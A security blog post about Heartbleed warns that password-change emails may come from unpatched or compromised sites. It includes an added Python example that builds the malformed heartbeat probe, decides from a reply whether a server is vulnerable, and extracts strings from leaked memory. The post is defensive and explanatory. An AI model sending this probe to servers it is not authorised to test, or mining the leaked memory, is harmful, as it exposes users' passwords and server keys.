
Heartbleed: Caveat Emptor


The news sounds relatively good about Heartbleed: the problem is known, a patch has been made to OpenSSL, and it is being applied in many places.

So, emails are rolling out from affected sites saying "change your password". But you should be leery, and here's why:

Was the site patched!?

I have seen too many emails that don't point out that they've actually patched the problem on their site! The trouble is that changing a password is done over TLS (https), which means sending your current and new password through that "encrypted" pipe. Heartbleed lets anyone who sends a malformed heartbeat to an unpatched server read chunks of that server's memory, and the memory of a web server is exactly where a just-submitted password sits. If they haven't patched their site, you are putting your account on that site at risk by the very act of changing the password. You may not have entered a password on that site since the bug was introduced (OpenSSL 1.0.1, March 2012), or at least not since it became publicly known and widely exploited, in which case you may not have been at risk before now. Changing your password on an unpatched site puts you at risk for certain.

Have your admins been compromised!?

Admins of a site go through the same https security as the rest of us, so who's to say they haven't been compromised? Given the previous section, if they have been compromised (and a patch hasn't been installed yet), then from a bad guy's point of view sending out an email telling everyone to change their passwords is an excellent way to harvest more passwords!

Caveat Emptor

Beware! You can't simply trust an email you get. Make sure that you use one or more trusted ways of detecting Heartbleed (or its absence) on that site before you change your password. Bear in mind, too, that patching the library is only half the job: because Heartbleed can leak the server's private key, a site that was vulnerable should also have reissued its TLS certificate and revoked the old one, and any password you set before the site was patched should be treated as exposed.

All the security pundits telling people to rush out and change their passwords aren't really helping either.
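To make "a trusted way of detecting Heartbleed" concrete, here is an added example, not code from the original post. It builds the standard Heartbleed probe record (a TLS heartbeat_request, RFC 6520, whose declared payload_length is far larger than the payload actually sent) and classifies a server's reply: an unpatched OpenSSL 1.0.1 through 1.0.1f (CVE-2014-0160) echoes the claimed number of bytes from its own memory, a patched server silently drops the record, and some servers answer with a TLS alert. The network side is deliberately left out: the probe only has meaning once a real TLS handshake has completed on the socket, and you should only send it to hosts you are authorised to test. The sample responses (`VULNERABLE_RESPONSE`, `PATCHED_SILENCE`, `PATCHED_ALERT`) and the "leaked" login form are constructed here for illustration, not captured from any real site.

```python
import struct

# TLS record content types (RFC 5246 / RFC 6520)
CT_ALERT = 21
CT_HEARTBEAT = 24
# Heartbeat message types (RFC 6520)
HB_REQUEST = 1
HB_RESPONSE = 2
TLS_1_1 = (3, 2)


def build_heartbeat_probe(claimed_len=0x4000, payload=b"", version=TLS_1_1):
    """Build the classic Heartbleed probe: a heartbeat_request whose declared
    payload_length (claimed_len) is far larger than the payload actually sent.
    An unpatched OpenSSL 1.0.1-1.0.1f copies claimed_len bytes of its own memory
    into the response; a patched server discards the record without replying.
    Must be sent on a socket where the TLS handshake has already completed."""
    body = struct.pack("!BH", HB_REQUEST, claimed_len) + payload
    header = struct.pack("!BBBH", CT_HEARTBEAT, version[0], version[1], len(body))
    return header + body


def parse_record(data):
    """Split one TLS record into (content_type, (major, minor), body).
    Returns None when data is empty or truncated."""
    if len(data) < 5:
        return None
    ctype, vmaj, vmin, length = struct.unpack("!BBBH", data[:5])
    body = data[5:5 + length]
    if len(body) != length:
        return None
    return ctype, (vmaj, vmin), body


def classify_response(data, sent_payload_len):
    """Decide whether a reply to the probe shows the bug.

    sent_payload_len is the number of payload bytes we really sent (not the
    claimed length). A correct response carries exactly that payload plus
    padding; a response that carries the *claimed* length is leaked memory.
    Returns (vulnerable: bool, reason: str)."""
    rec = parse_record(data)
    if rec is None:
        return False, "no heartbeat response (a patched server drops the record)"
    ctype, _, body = rec
    if ctype == CT_ALERT:
        return False, "TLS alert: server rejected the malformed heartbeat"
    if ctype != CT_HEARTBEAT:
        return False, "unexpected record type %d" % ctype
    if len(body) < 3:
        return False, "malformed heartbeat record"
    hb_type, declared = struct.unpack("!BH", body[:3])
    if hb_type != HB_RESPONSE:
        return False, "heartbeat record is not a response"
    returned = len(body) - 3  # payload plus padding
    if declared > sent_payload_len and returned >= declared:
        return True, "server echoed %d bytes for a %d-byte payload" % (returned, sent_payload_len)
    return False, "response sized to the %d payload bytes actually sent" % sent_payload_len


def printable_strings(blob, min_len=6):
    """Pull printable ASCII runs out of leaked memory (what an attacker reads)."""
    out, run = [], bytearray()
    for b in blob:
        if 32 <= b < 127:
            run.append(b)
        else:
            if len(run) >= min_len:
                out.append(run.decode("ascii"))
            run = bytearray()
    if len(run) >= min_len:
        out.append(run.decode("ascii"))
    return out


def _heartbeat_response(declared, payload, padding=b"\x00" * 16):
    # Helper to fabricate a heartbeat_response record (RFC 6520 requires >= 16 bytes padding).
    body = struct.pack("!BH", HB_RESPONSE, declared) + payload + padding
    return struct.pack("!BBBH", CT_HEARTBEAT, 3, 2, len(body)) + body


# Constructed sample responses (assumptions for this example, not real captures):
# an unpatched server echoing 16 KiB of heap that happens to hold a freshly POSTed login form
LEAKED = (b"\x00" * 200 + b"username=alice&password=Tr0ub4dor&3" + b"\x00" * 400).ljust(0x4000, b"\x00")
VULNERABLE_RESPONSE = _heartbeat_response(0x4000, LEAKED)
# a patched server: the record is silently dropped, so the socket read returns nothing
PATCHED_SILENCE = b""
# a server that answers with a fatal alert instead (level=fatal(2), unexpected_message(10))
PATCHED_ALERT = struct.pack("!BBBH", CT_ALERT, 3, 2, 2) + bytes([2, 10])


if __name__ == "__main__":
    probe = build_heartbeat_probe()
    print("probe record (%d bytes): %s" % (len(probe), probe.hex()))
    for name, resp in [("vulnerable", VULNERABLE_RESPONSE), ("silent", PATCHED_SILENCE), ("alert", PATCHED_ALERT)]:
        vuln, why = classify_response(resp, 0)
        print("%-10s vulnerable=%s (%s)" % (name, vuln, why))
    # skip the 5-byte record header and 3-byte heartbeat header to reach the echoed memory
    print("leaked strings:", printable_strings(VULNERABLE_RESPONSE[8:]))
```

The decision rule is the one every public Heartbleed tester relies on: the size of what comes back, not its content. A patched server never answers the malformed request, which is why a read timeout (here `PATCHED_SILENCE`) is the healthy outcome and must not be mistaken for a network error. Note also that a silent or alerting response only tells you the heartbeat bug is closed; it says nothing about whether the site's certificate was reissued afterwards.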

This entry was posted in Heartbleed, Security by PeterRitchie.